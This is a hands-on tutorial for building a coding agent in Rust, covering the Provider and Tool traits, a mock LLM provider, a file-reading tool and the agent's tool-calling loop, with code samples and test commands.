Overview
Welcome to Building a Coding Agent in Rust -- a hands-on tutorial where you build your own AI coding agent from scratch in the mini-claw-code-starter template, guided by the architecture of Claude Code.
Looking for the original V1 hands-on tutorial? It's archived at archive/v1-book/en/ (Chinese translation at archive/v1-book/zh/).
What you'll build
By the end of this book, you'll have built a complete coding agent that:
- Connects to an LLM via an OpenAI-compatible HTTP provider
- Uses tools -- bash, file read/write/edit -- with a simple `Tool` trait
- Loops autonomously -- the `SimpleAgent` drives the provider-tool cycle until done
- Streams events through channels so a UI can show progress in real time
- Tests deterministically with a `MockProvider` that returns canned responses
- Enforces safety with a permission engine, safety checks, and hooks
- Loads project instructions from CLAUDE.md files and layered config
Architecture
The starter codebase uses a flat module layout:
```text
mini-claw-code-starter/src/
  types.rs         -- Messages, tools, ToolSet, Provider trait, TokenUsage
  agent.rs         -- SimpleAgent (the core agent loop) and AgentEvent
  mock.rs          -- MockProvider for deterministic testing
  streaming.rs     -- SSE parsing, StreamAccumulator
  instructions.rs  -- InstructionLoader (CLAUDE.md discovery)
  permissions.rs   -- PermissionEngine
  safety.rs        -- SafetyChecker, SafeToolWrapper
  hooks.rs         -- Hook trait, HookRegistry
  planning.rs      -- PlanAgent (two-phase plan/execute)
  config.rs        -- Config, ConfigLoader, CostTracker
  context.rs       -- SystemPromptBuilder
  providers/
    openrouter.rs  -- OpenRouterProvider (real HTTP backend)
  tools/           -- Tool implementations (bash, file read/write/edit)
```
How to use this book
Start with Chapters 1-3. Three short, hands-on chapters get you from zero to a working agent in under an hour:
- Your First LLM Call — implement `MockProvider` (`test_mock_`)
- Your First Tool Call — implement `ReadTool` (`test_read_`)
- The Agentic Loop — implement `single_turn` and `SimpleAgent` (`test_single_turn_`, `test_simple_agent_`)
Then continue with Chapters 4-18 for the full architecture: streaming, permissions, hooks, plan mode, configuration, and more.
The mini-claw-code-starter crate contains stub implementations with unimplemented!() markers and doc comments describing what to do. Read the chapter, fill in the stubs, then verify your work by running the tests.
Run tests to check your progress:
```sh
# Run tests for a specific chapter (use the correct test name from the table below)
cargo test -p mini-claw-code-starter test_mock_

# Run all tests
cargo test -p mini-claw-code-starter
```
Prerequisites
- Rust (edition 2024, 1.85+)
- Basic familiarity with async Rust (`async`/`await`, `tokio`)
- An OpenRouter API key (for the live provider chapters)
Chapter roadmap
Getting Started
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 1 | Your First LLM Call | src/mock.rs | test_mock_ |
| 2 | Your First Tool Call | src/tools/read.rs | test_read_ |
| 3 | The Agentic Loop | src/agent.rs | test_single_turn_, test_simple_agent_ |
Part I: Core Agent
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 4 | Messages & Types | src/types.rs (pre-filled) | test_mock_ |
| 5a | Provider & Streaming Foundations | src/mock.rs, src/streaming.rs | test_mock_, test_streaming_parse_, test_streaming_accumulator_ |
| 5b | OpenRouter & StreamingAgent | src/providers/openrouter.rs, src/streaming.rs | test_openrouter_, test_streaming_stream_chat_, test_streaming_streaming_agent_ |
| 6 | Tool Interface | src/tools/read.rs (already done in Ch2 — re-read) | test_read_ |
| 7 | The Agentic Loop (Deep Dive) | src/agent.rs (already done in Ch3 — re-read) | test_single_turn_, test_simple_agent_ |
Part II: Prompt & Tools
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 8 | System Prompt | src/instructions.rs | instructions |
| 9 | File Tools | src/tools/write.rs, src/tools/edit.rs (read.rs already done in Ch2) | test_read_, test_write_, test_edit_ |
| 10 | Bash Tool | src/tools/bash.rs | test_bash_ |
| 11 | Search Tools | (extension -- no stubs) | (no tests) |
| 12 | Tool Registry | src/types.rs (ToolSet — pre-filled, re-read) | test_multi_tool_ |
Part III: Safety & Control
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 13 | Permission Engine | src/permissions.rs | permissions |
| 14 | Safety Checks | src/safety.rs | safety |
| 15 | Hooks | src/hooks.rs | hooks |
| 16 | Plan Mode | src/planning.rs | plan |
Part IV: Configuration
| Chapter | Topic | File(s) to edit | Test command |
|---|---|---|---|
| 17 | Settings Hierarchy | src/config.rs, src/usage.rs | config, cost_tracker |
| 18 | Project Instructions | src/instructions.rs, src/context.rs | instructions, context_manager |
Bonus (no chapter yet -- stubs + tests available)
| Topic | File to edit | Test command |
|---|---|---|
| AskTool (user input) | src/tools/ask.rs | ask (run with --ignored) |
| SubagentTool (child agents) | src/subagent.rs | subagent (run with --ignored) |
| Interactive CLI | examples/chat.rs | cargo run --example chat (after stub is filled in) |
Let's start building.
Chapter 1: Your First LLM Call
File(s) to edit: `src/mock.rs`
Test to run: `cargo test -p mini-claw-code-starter test_mock_`
Estimated time: 15 min
Before building an agent, you need to talk to an LLM. In this chapter you will implement a MockProvider — a fake LLM that returns canned responses. No API key, no HTTP, no network. Just the protocol.
The nouns
Before any code, a one-line glossary of the types you'll meet in chapters 1–3. They're all already defined in src/types.rs — this list is just so the names aren't strangers. Chapter 4 is the deep dive; for now, a sentence each is enough:
| Type | What it is |
|---|---|
| `Message` | Enum of conversation entries: `System`, `User`, `Assistant`, `ToolResult`. |
| `AssistantTurn` | What the LLM returns: optional text, a `Vec<ToolCall>`, a `StopReason`, optional `TokenUsage`. |
| `StopReason` | `Stop` (the LLM is done) or `ToolUse` (it wants to call tools). |
| `ToolCall` | LLM's request to call a tool: id, name, JSON arguments. |
| `ToolDefinition` | JSON-Schema description of a tool, sent to the LLM so it knows what's available. |
| `Tool` | Trait with `definition()` and `call()` — implement it to give the agent a new capability. |
| `ToolSet` | A `HashMap<String, Box<dyn Tool>>` for dispatching tool calls by name. |
| `Provider` | Trait with one `chat()` method — the abstraction over "an LLM that responds to messages." |
If any of these feel fuzzy later, come back here. Chapter 4 rebuilds all of them from scratch with full commentary.
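To make the shapes concrete, here is a dependency-free sketch of how an `AssistantTurn` carrying a tool call fits together. The mirror types below are illustrative only -- the real definitions live in `src/types.rs`, and `ToolCall.arguments` there is a `serde_json::Value`, not a `String`:

```rust
// Simplified mirrors of the types in src/types.rs, just to see the shapes.
#[derive(Debug, PartialEq)]
enum StopReason { Stop, ToolUse }

struct ToolCall { id: String, name: String, arguments: String }

struct AssistantTurn {
    text: Option<String>,
    tool_calls: Vec<ToolCall>,
    stop_reason: StopReason,
}

fn main() {
    // A turn where the model wants to call the `read` tool:
    let turn = AssistantTurn {
        text: None,
        tool_calls: vec![ToolCall {
            id: "call_1".into(),
            name: "read".into(),
            arguments: r#"{"path": "doc.txt"}"#.into(),
        }],
        stop_reason: StopReason::ToolUse,
    };
    assert_eq!(turn.stop_reason, StopReason::ToolUse);
    assert_eq!(turn.tool_calls[0].name, "read");
}
```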
Goal
Implement MockProvider so that:
- You create it with a `VecDeque<AssistantTurn>` of canned responses.
- Each call to `chat()` returns the next response in sequence.
- If all responses have been consumed, it returns an error.
The protocol
Every LLM interaction follows the same pattern:
```mermaid
sequenceDiagram
    participant C as Your Code
    participant L as LLM
    C->>L: messages + tool definitions
    L-->>C: text and/or tool calls + stop reason
```
You send messages and a list of available tools. The LLM responds with text, tool calls, or both — plus a StopReason telling you what to do next.
In Rust, that is one trait with one method:
```rust
pub trait Provider: Send + Sync {
    fn chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send;
}
```
The core types
Open mini-claw-code-starter/src/types.rs. These types are already defined for you — read them to understand the protocol:
```mermaid
classDiagram
    class Provider {
        <<trait>>
        +chat(messages, tools) AssistantTurn
    }
    class AssistantTurn {
        text: Option~String~
        tool_calls: Vec~ToolCall~
        stop_reason: StopReason
        usage: Option~TokenUsage~
    }
    class StopReason {
        <<enum>>
        Stop
        ToolUse
    }
    class Message {
        <<enum>>
        System(String)
        User(String)
        Assistant(AssistantTurn)
        ToolResult
    }
    Provider --> AssistantTurn : returns
    Provider --> Message : receives
    AssistantTurn --> StopReason
    AssistantTurn --> ToolCall : contains 0..*
```
The LLM responds with an AssistantTurn:
```rust
pub struct AssistantTurn {
    pub text: Option<String>,       // what the LLM said
    pub tool_calls: Vec<ToolCall>,  // tools it wants to call
    pub stop_reason: StopReason,    // Stop or ToolUse
    pub usage: Option<TokenUsage>,  // token counts (optional)
}
```
Two outcomes:
- `StopReason::Stop` — the LLM is done, read `text` for the answer
- `StopReason::ToolUse` — the LLM wants to call tools, read `tool_calls`
That's it. Every coding agent — Claude Code, Cursor, Copilot — runs on this exact protocol.
Key Rust concept: Mutex for interior mutability
The Provider trait takes &self (not &mut self) because providers are shared across async tasks. But MockProvider needs to mutate its response queue. The solution is Mutex<VecDeque<AssistantTurn>> — it lets you mutate the queue through a shared reference.
```rust
pub struct MockProvider {
    responses: Mutex<VecDeque<AssistantTurn>>,
}
```
This pattern — Mutex around shared state in a &self method — appears throughout async Rust.
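A dependency-free sketch of the pattern, with a plain queue of integers standing in for the response queue:

```rust
use std::collections::VecDeque;
use std::sync::Mutex;

// A minimal stand-in for MockProvider's state: a queue that can be
// popped through a shared reference, thanks to Mutex's interior mutability.
struct Queue {
    items: Mutex<VecDeque<i32>>,
}

impl Queue {
    fn pop(&self) -> Option<i32> { // note: &self, not &mut self
        self.items.lock().unwrap().pop_front()
    }
}

fn main() {
    let q = Queue { items: Mutex::new(VecDeque::from([1, 2])) };
    assert_eq!(q.pop(), Some(1)); // FIFO order
    assert_eq!(q.pop(), Some(2));
    assert_eq!(q.pop(), None);    // exhausted -- MockProvider turns this into an error
}
```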
The implementation
Open src/mock.rs. You'll see the struct definition and two stubs.
Step 1: new()
Wrap the VecDeque in a Mutex:
```rust
pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
    Self {
        responses: Mutex::new(responses),
    }
}
```
Step 2: chat()
Lock the mutex, pop the front response, convert None to an error:
```rust
async fn chat(
    &self,
    _messages: &[Message],
    _tools: &[&ToolDefinition],
) -> anyhow::Result<AssistantTurn> {
    self.responses
        .lock()
        .unwrap()
        .pop_front()
        .ok_or_else(|| anyhow::anyhow!("MockProvider: no more responses"))
}
```
Three lines of logic. The mock ignores messages and tools entirely — it just returns the next canned response.
Run the tests
```sh
cargo test -p mini-claw-code-starter test_mock_
```
14 tests verify your mock, including:

- `test_mock_returns_text` — basic text response
- `test_mock_returns_tool_calls` — response with tool calls
- `test_mock_steps_through_sequence` — FIFO order across multiple calls
- `test_mock_empty_responses_exhausted` — error when queue is empty
- `test_mock_ignores_messages_and_tools` — mock doesn't look at inputs
- `test_mock_long_sequence` — 10 responses consumed in order
What just happened
You implemented the Provider trait — the interface every LLM backend must satisfy. The MockProvider is your testing workhorse. Every test in this entire course uses it instead of calling a real API.
Later (Chapter 5b) you'll see OpenRouterProvider, which makes real HTTP calls. But the trait is the same. Swap the provider, and the rest of the code doesn't change.
Key takeaway
An LLM is a function: messages in → (text, tool_calls, stop_reason) out. Everything else is plumbing.
Check yourself
Chapter 2: Your First Tool Call
File(s) to edit: `src/tools/read.rs`
Test to run: `cargo test -p mini-claw-code-starter test_read_`
Estimated time: 15 min
An LLM can't read files, run commands, or browse the web. It can only generate text. But it can ask your code to do those things. That's what tools are.
Goal
Implement ReadTool so that:
- It declares its name, description, and parameter schema.
- When called with `{"path": "some/file.txt"}`, it reads the file and returns its contents.
- Missing arguments or non-existent files produce errors.
How tool calling works
The LLM never touches the filesystem. It describes what it wants, and your code does it:
```mermaid
sequenceDiagram
    participant A as Agent
    participant L as LLM
    participant T as ReadTool
    A->>L: "What's in doc.txt?" + tool schemas
    L-->>A: tool_call: read(path="doc.txt")
    A->>T: call({"path": "doc.txt"})
    T-->>A: "file contents here..."
    A->>L: tool result: "file contents here..."
    L-->>A: "The file contains..."
```
The LLM sees a JSON schema describing each tool. When it decides to use one, it outputs a structured request with the tool name and arguments. Your code parses this, runs the real function, and sends the result back.
The Tool trait
Open mini-claw-code-starter/src/types.rs and find the Tool trait:
```rust
#[async_trait::async_trait]
pub trait Tool: Send + Sync {
    fn definition(&self) -> &ToolDefinition;
    async fn call(&self, args: Value) -> anyhow::Result<String>;
}
```
Two methods:
- `definition()` returns the JSON schema that tells the LLM what this tool does and what arguments it takes
- `call()` executes the tool and returns a string result
Why #[async_trait] on Tool — and not on Provider?
You'll see this split throughout the book, so it's worth owning the one-liner now:
- `Tool` uses `#[async_trait]` because we store tools heterogeneously in `Box<dyn Tool>` (a `ReadTool` and a `BashTool` coexist in one `HashMap`). `Box<dyn …>` requires object safety, and a plain `async fn` in a trait is not object-safe -- it returns an anonymous future type the compiler can't erase. The `#[async_trait]` macro rewrites `async fn call(&self, …)` into `fn call(&self, …) -> Pin<Box<dyn Future + Send + '_>>`, which is. One heap allocation per call, which is nothing next to the I/O the tool is about to do.
- `Provider` uses RPITIT (return-position `impl Trait` in traits, stable since Rust 1.75) because we only ever hold it as a generic parameter -- `SimpleAgent<P: Provider>` -- never as `dyn Provider`. Without object safety to preserve, we get the zero-cost version: no boxing, no allocation, the compiler monomorphizes a unique future type per impl.
The two-line mnemonic:
```text
stored as Box<dyn T>        → #[async_trait]  (boxed future, object-safe)
used as a generic P: Trait  → RPITIT          (zero-cost, not object-safe)
```
That's the whole trade-off. Chapter 6 reprises it with the full Provider signature side-by-side once you've seen both traits in use.
The implementation
Open src/tools/read.rs. You'll see the struct and two stubs.
Step 1: The definition
A ToolDefinition describes the tool to the LLM using JSON Schema:
```rust
pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new("read", "Read the contents of a file.")
            .param("path", "string", "Absolute path to the file", true),
    }
}
```
The .param() builder adds a parameter with its type, description, and whether it's required. When the LLM sees this schema, it knows it can call a tool named "read" with a required string argument "path".
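Assuming the builder shape shown in Chapter 4 (an object schema with `properties` and `required`), the JSON the LLM receives for this tool should look roughly like:

```json
{
  "name": "read",
  "description": "Read the contents of a file.",
  "parameters": {
    "type": "object",
    "properties": {
      "path": { "type": "string", "description": "Absolute path to the file" }
    },
    "required": ["path"]
  }
}
```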
Step 2: The call
Extract the path from the JSON arguments, read the file, return the contents:
```rust
async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;
    tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))
}
```
Three lines of logic. args is a serde_json::Value — the parsed JSON arguments from the LLM. The context() and with_context() methods (from anyhow) add human-readable error messages.
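You don't need `anyhow` to see the idea. A dependency-free sketch of the same error-wrapping pattern, using `map_err` and a `String` error (a hypothetical helper, not the starter's code):

```rust
use std::fs;

// What `with_context` adds, approximately: the underlying io::Error is
// wrapped in a human-readable message that names the path.
fn read_file(path: &str) -> Result<String, String> {
    fs::read_to_string(path).map_err(|e| format!("failed to read '{path}': {e}"))
}

fn main() {
    let err = read_file("/no/such/file/hopefully").unwrap_err();
    // The caller sees both the path and the OS-level cause.
    assert!(err.starts_with("failed to read '/no/such/file/hopefully'"));
}
```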
Here is the data flow:
```mermaid
flowchart LR
    A["args: path = foo.txt"] --> B["as_str()"]
    B --> C["tokio::fs::read_to_string"]
    C --> D["Ok: file contents"]
    C --> E["Err: failed to read"]
```
Run the tests
```sh
cargo test -p mini-claw-code-starter test_read_
```
15 tests verify your tool, including:

- `test_read_read_definition` — schema has the right name and required params
- `test_read_read_file` — reads a real file from a temp directory
- `test_read_read_missing_file` — returns an error for nonexistent files
- `test_read_read_missing_arg` — returns an error when `path` is missing
- `test_read_read_utf8_content` — handles multi-line content correctly
- `test_read_read_empty_file` — reads an empty file without error
The pattern
Every tool in this project follows the same three-step pattern:
- Define — `ToolDefinition::new("name", "description").param(...)`
- Extract — pull arguments from the JSON `Value`
- Execute — do the thing, return a `String`
You'll repeat this for WriteTool, EditTool, and BashTool in later chapters. Once you've written one tool, you've written them all.
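As a preview of the pattern repeating, here is the Execute step of a write tool, sketched synchronously and dependency-free. This is a hypothetical helper, not the starter's code -- the real `WriteTool` in Chapter 9 goes through the `Tool` trait, JSON `args`, and `tokio::fs`:

```rust
use std::env;
use std::fs;

// Step 3 ("Execute") of a write tool: do the thing, return a String.
fn write_tool(path: &str, content: &str) -> Result<String, String> {
    fs::write(path, content).map_err(|e| format!("failed to write '{path}': {e}"))?;
    Ok(format!("wrote {} bytes to {path}", content.len()))
}

fn main() {
    let path = env::temp_dir().join("write_tool_sketch.txt");
    let path = path.to_str().unwrap();
    let result = write_tool(path, "hello").unwrap();
    assert_eq!(result, format!("wrote 5 bytes to {path}"));
    assert_eq!(fs::read_to_string(path).unwrap(), "hello");
}
```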
Key takeaway
A tool is the bridge between "the LLM wants to read a file" and "the file is actually read." The LLM describes its intent as structured JSON. Your code does the work.
Check yourself
Chapter 3: The Agentic Loop
File(s) to edit: `src/agent.rs`
Tests to run: `cargo test -p mini-claw-code-starter test_single_turn_` (for `single_turn`), `cargo test -p mini-claw-code-starter test_simple_agent_` (for `SimpleAgent`)
Estimated time: 20 min
You have a provider (talks to the LLM) and a tool (reads files). Now you connect them. This is where the agent comes alive.
Goal
Implement two things:
- `single_turn()` — handle one prompt with at most one round of tool calls
- `SimpleAgent` — wrap `single_turn` in a loop that keeps going until the LLM is done
What's in scope for Ch3 (and what isn't)
When you open src/agent.rs you'll see five unimplemented!() stubs. Only four of them are Chapter 3's job:
| Stub | Chapter | Notes |
|---|---|---|
| `single_turn` | Ch3 | one prompt, at most one tool round |
| `SimpleAgent::execute_tools` | Ch3 | look up each tool, collect `(id, content)` pairs |
| `SimpleAgent::push_results` | Ch3 | push `Assistant` turn, then one `ToolResult` each |
| `SimpleAgent::chat` | Ch3 | the main agent loop |
| `SimpleAgent::run_with_history` | Ch7 | events-based loop; leave stubbed for now |
The run_with_history / run_with_events pair is for Chapter 7 (AgentEvent-driven execution). No Ch3 test calls them, so the unimplemented!() there will not panic during test_simple_agent_. Ignore them until Chapter 7 introduces the events model.
The core idea
Every coding agent — Claude Code, Cursor, Aider — is this loop:
```text
loop {
    response = provider.chat(messages, tools)
    if response.stop_reason == Stop:
        return response.text
    for call in response.tool_calls:
        result = tools.execute(call)
        messages.append(result)
}
```
The LLM decides when to stop. Your code just follows instructions.
```mermaid
flowchart TD
    A["User prompt"] --> B["provider.chat()"]
    B --> C{"stop_reason?"}
    C -- "Stop" --> D["Return text"]
    C -- "ToolUse" --> E["Execute tool calls"]
    E --> F["Append results to messages"]
    F --> B
```
Part 1: single_turn()
Start simple. single_turn() handles one prompt with at most one round of tool calls — no looping yet.
Key Rust concept: ToolSet
The function takes a &ToolSet — a HashMap<String, Box<dyn Tool>> that indexes tools by name for O(1) lookup:
```rust
pub async fn single_turn<P: Provider>(
    provider: &P,
    tools: &ToolSet,
    prompt: &str,
) -> anyhow::Result<String>
```
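A synchronous miniature of that dispatch, with a simplified `Tool` trait (the real one is async and returns `anyhow::Result<String>`):

```rust
use std::collections::HashMap;

// A sync miniature of ToolSet: name -> boxed trait object, O(1) lookup.
trait Tool {
    fn call(&self, args: &str) -> String;
}

struct EchoTool;
impl Tool for EchoTool {
    fn call(&self, args: &str) -> String {
        format!("echo: {args}")
    }
}

fn main() {
    let mut tools: HashMap<String, Box<dyn Tool>> = HashMap::new();
    tools.insert("echo".to_string(), Box::new(EchoTool));

    // Dispatch by name, like single_turn does: unknown tools become
    // an error string instead of a panic.
    let dispatch = |name: &str, args: &str| match tools.get(name) {
        Some(t) => t.call(args),
        None => format!("error: unknown tool `{name}`"),
    };

    assert_eq!(dispatch("echo", "hi"), "echo: hi");
    assert_eq!(dispatch("bash", "ls"), "error: unknown tool `bash`");
}
```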
The flow
```mermaid
flowchart TD
    A["prompt"] --> B["provider.chat()"]
    B --> C{"stop_reason?"}
    C -- "Stop" --> D["Return text"]
    C -- "ToolUse" --> E["Execute each tool call"]
    E --> F{"Tool found?"}
    F -- "Yes" --> G["tool.call() → result"]
    F -- "No" --> H["error: unknown tool"]
    G --> I["Push Assistant + ToolResult messages"]
    H --> I
    I --> J["provider.chat() again"]
    J --> K["Return final text"]
```
Implementation
```rust
pub async fn single_turn<P: Provider>(
    provider: &P,
    tools: &ToolSet,
    prompt: &str,
) -> anyhow::Result<String> {
    let defs = tools.definitions();
    let mut messages = vec![Message::User(prompt.to_string())];

    let turn = provider.chat(&messages, &defs).await?;

    match turn.stop_reason {
        StopReason::Stop => Ok(turn.text.unwrap_or_default()),
        StopReason::ToolUse => {
            // Execute each tool call, collect results
            let mut results = Vec::new();
            for call in &turn.tool_calls {
                let content = match tools.get(&call.name) {
                    Some(t) => t
                        .call(call.arguments.clone())
                        .await
                        .unwrap_or_else(|e| format!("error: {e}")),
                    None => format!("error: unknown tool `{}`", call.name),
                };
                results.push((call.id.clone(), content));
            }

            // Feed results back to the LLM
            messages.push(Message::Assistant(turn));
            for (id, content) in results {
                messages.push(Message::ToolResult { id, content });
            }

            let final_turn = provider.chat(&messages, &defs).await?;
            Ok(final_turn.text.unwrap_or_default())
        }
    }
}
```
Three key details:
- Collect results before pushing `Message::Assistant(turn)` — the push moves `turn`, so you can't borrow `turn.tool_calls` after that
- Never crash on tool failure — catch errors with `unwrap_or_else` and return them as strings. The LLM reads the error and adapts
- Unknown tools get an error string — not a panic. The LLM might hallucinate a tool name; your agent handles it gracefully
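The first detail is worth seeing in isolation. A minimal sketch of why the collect-then-push order matters (simplified shapes, not the starter's types):

```rust
// Pushing moves `turn` into the vector, so any later use of `turn.tool_calls`
// would not compile. Collecting what we need first sidesteps the problem.
enum Message {
    Assistant(Turn),
    ToolResult { id: String },
}

struct Turn {
    tool_calls: Vec<String>, // call ids, simplified
}

fn main() {
    let turn = Turn { tool_calls: vec!["call_1".into(), "call_2".into()] };

    // 1. Collect everything we need from `turn` first...
    let ids: Vec<String> = turn.tool_calls.clone();

    // 2. ...then move `turn` into the message list. `turn` is gone after this line.
    let mut messages = vec![Message::Assistant(turn)];
    for id in ids {
        messages.push(Message::ToolResult { id });
    }
    assert_eq!(messages.len(), 3); // 1 Assistant + 2 ToolResults
}
```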
Test it
```sh
cargo test -p mini-claw-code-starter test_single_turn_
```
14 tests including:
- `test_single_turn_direct_response` — LLM responds immediately, no tools
- `test_single_turn_one_tool_call` — LLM reads a file, then answers
- `test_single_turn_unknown_tool` — LLM calls a nonexistent tool, gets an error, recovers
- `test_single_turn_provider_error` — provider returns an error, propagated correctly
Part 2: SimpleAgent
single_turn handles one round. A real agent loops until the LLM is done. That's SimpleAgent.
The struct
```rust
pub struct SimpleAgent<P: Provider> {
    provider: P,
    tools: ToolSet,
}
```
Constructor and builder
```rust
pub fn new(provider: P) -> Self {
    Self { provider, tools: ToolSet::new() }
}

pub fn tool(mut self, t: impl Tool + 'static) -> Self {
    self.tools.push(t);
    self
}
```
The builder pattern lets you chain tool registration:
```rust
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(BashTool::new());
```
The loop: chat()
Aside: who decides Stop vs ToolUse?
The model does. StopReason is not a value we compute from the response; it is
a field the LLM API returns describing what the model did. When the model
emitted plain text and stopped, the API reports stop (or end_turn). When
the model emitted one or more tool-call blocks and paused expecting the
caller to run them, the API reports tool_use (OpenAI calls it
tool_calls). Our StopReason enum is just a thin translation of that API
field into a Rust type; the decision is baked into the model's generation.
Practically, the model decides in a single forward pass: once it begins
writing a tool-call block, most providers force the response to terminate on
that block and return tool_use to the caller. It does not produce text
and then choose whether to call a tool as a separate step. This is why the
loop below looks so simple -- we never have to second-guess the stop reason,
we just dispatch on it.
This is single_turn generalized into a loop. Instead of calling the provider twice and returning, it keeps going until StopReason::Stop:
```rust
pub async fn chat(&self, messages: &mut Vec<Message>) -> anyhow::Result<String> {
    let defs = self.tools.definitions();
    loop {
        let turn = self.provider.chat(messages, &defs).await?;
        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let results = self.execute_tools(&turn.tool_calls).await;
                Self::push_results(messages, turn, results);
            }
        }
    }
}
```
Note: clone turn.text before pushing Message::Assistant(turn) — the push moves turn.
run() is a convenience wrapper:
```rust
pub async fn run(&self, prompt: &str) -> anyhow::Result<String> {
    let mut messages = vec![Message::User(prompt.to_string())];
    self.chat(&mut messages).await
}
```
The helper methods execute_tools() and push_results() factor out the tool execution and message building — see the stubs in agent.rs for the signatures.
Test it
```sh
cargo test -p mini-claw-code-starter test_simple_agent_
```
16 tests including:
- `test_simple_agent_simple_text` — single-turn text response
- `test_simple_agent_multi_step` — LLM reads a file, then writes a response
- `test_simple_agent_three_turn_loop` — read → edit → verify, three rounds
- `test_simple_agent_error_recovery` — tool fails, LLM reads the error and adapts
What just happened
You built a coding agent.
```rust
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(BashTool::new());

let answer = agent.run("What files are in this directory?").await?;
```
The agent sends the prompt to the LLM, the LLM calls bash("ls"), the agent executes it, feeds the output back, and the LLM summarizes the result. The loop handles any number of tool calls across any number of rounds.
That is the architecture. Everything else — streaming, permissions, plan mode, subagents — is built on top of this loop.
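The whole loop can be simulated synchronously against a queue of canned turns, the same way the `MockProvider` tests exercise it -- simplified shapes, no async:

```rust
use std::collections::VecDeque;

// Simplified shapes: each canned provider turn either finishes with text
// or asks for tool calls (call descriptions stand in for real ToolCalls).
enum Turn {
    Done(String),
    ToolUse(Vec<String>),
}

// The SimpleAgent::chat loop, sync and dependency-free: keep asking the
// "provider" until it stops, counting tool rounds along the way.
fn run(mut provider: VecDeque<Turn>) -> (usize, String) {
    let mut rounds = 0;
    loop {
        match provider.pop_front().expect("mock exhausted") {
            Turn::Done(text) => return (rounds, text),
            Turn::ToolUse(calls) => {
                rounds += 1;
                // a real agent would execute each call here and push
                // Assistant + ToolResult messages before looping
                let _ = calls;
            }
        }
    }
}

fn main() {
    let canned = VecDeque::from([
        Turn::ToolUse(vec!["bash ls".into()]),
        Turn::ToolUse(vec!["read notes.txt".into()]),
        Turn::Done("two files found".into()),
    ]);
    let (rounds, answer) = run(canned);
    assert_eq!(rounds, 2);
    assert_eq!(answer, "two files found");
}
```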
Check yourself
Chapter 4: Messages & Types
File(s) to edit: none — `src/types.rs` is pre-filled in the starter. This chapter is a study-only deep dive into the type system you have already been using.
Test to run: `cargo test -p mini-claw-code-starter test_mock_` still passes after this chapter (and did before) because the actual implementation work is in `src/mock.rs`, which you filled in back in Chapter 1. The tests exercise the shapes defined in `types.rs`, which is why we connect them here.
Estimated time: 20 min (study only)
Goal
- Understand how the `Message` enum's four variants (`System`, `User`, `Assistant`, `ToolResult`) give every conversation participant a typed representation.
- Understand the `ToolDefinition` builder pattern and why tools describe their JSON Schema parameters at construction time rather than hand-writing JSON.
- Understand `ToolSet` as the runtime registry that lets the agent dispatch tool calls by name.
- Understand the `Provider` trait's RPITIT signature and why it leaves room for any LLM backend to drop in without changing agent code.
Every coding agent is, at its core, a loop over a conversation. The user speaks, the model replies, tools produce results, and those results go back to the model. Before we can build that loop, we need a type system that represents every participant and every kind of payload in the conversation.
This chapter walks through the foundational types that the rest of the codebase depends on. Nothing here needs to be written by you -- src/types.rs is complete in the starter. Read for comprehension; the hands-on work resumes in Chapter 5a.
How the types connect
```mermaid
flowchart TD
    U[Message::User] --> P[Provider::chat]
    S[Message::System] --> P
    P --> AT[AssistantTurn]
    AT --> SR{StopReason}
    SR -->|Stop| Text[Final text response]
    SR -->|ToolUse| TC[ToolCall]
    TC --> TS[ToolSet::get]
    TS --> T[Tool::call]
    T --> TR[Message::ToolResult]
    TR --> P
```
Why a rich message type?
If you look at a raw LLM API (OpenAI, Anthropic), messages are JSON blobs with a role field: "system", "user", or "assistant". That is fine for a one-shot chatbot, but a coding agent needs more:
- Tool results that carry the ID of the tool call they answer, so the model can correlate request and response.
- System instructions that configure the model's behavior.
Claude Code models all of these as variants of a single Message enum. Our starter uses a simplified version with four variants.
File layout
All types live in a single file: src/types.rs. This includes the Message enum, AssistantTurn, ToolDefinition, ToolCall, Tool trait, ToolSet, Provider trait, TokenUsage, and StopReason.
1.1 The Message enum
Here is the full enum with its four variants:
```rust
pub enum Message {
    System(String),
    User(String),
    Assistant(AssistantTurn),
    ToolResult { id: String, content: String },
}
```
The starter uses plain enum variants instead of wrapper structs. There are no message IDs, no serde tags, no constructors -- you construct variants directly:
```rust
let msg = Message::User("Hello".to_string());
let sys = Message::System("You are a helpful assistant".to_string());
let result = Message::ToolResult {
    id: call_id.clone(),
    content: "file contents here".to_string(),
};
```
Let's walk through each variant.
System
```rust
Message::System(String)
```
System messages carry instructions injected by the agent, not typed by the user. They configure the model's behavior (e.g., "You are a coding assistant").
User
```rust
Message::User(String)
```
Straightforward -- the human's input. One message per turn.
Assistant
```rust
Message::Assistant(AssistantTurn)
```
This is the richest variant. The model's response is wrapped in an AssistantTurn struct (described below). The model can return text, tool calls, or both.
ToolResult
```rust
Message::ToolResult { id: String, content: String }
```
After the agent executes a tool, it packages the output into a ToolResult variant and appends it to the conversation. The id field links this result back to the specific ToolCall it answers -- without this, the model cannot correlate which result belongs to which call when multiple tools run in a single turn.
Note that in the starter, tool results are simple strings. There is no is_truncated flag or separate struct.
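A small sketch of why the `id` matters when a single turn contains several tool calls (simplified shapes; the starter's `ToolCall` also carries JSON arguments):

```rust
// With two calls in one turn, the id is the only way the model can tell
// which output answers which request.
struct ToolCall { id: String, name: String }
struct ToolResult { id: String, content: String }

fn main() {
    let calls = vec![
        ToolCall { id: "call_1".into(), name: "read".into() },
        ToolCall { id: "call_2".into(), name: "bash".into() },
    ];

    // Execute in order, tagging each result with the originating call's id.
    let results: Vec<ToolResult> = calls
        .iter()
        .map(|c| ToolResult {
            id: c.id.clone(),
            content: format!("output of {}", c.name),
        })
        .collect();

    assert_eq!(results[1].id, "call_2");
    assert_eq!(results[1].content, "output of bash");
}
```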
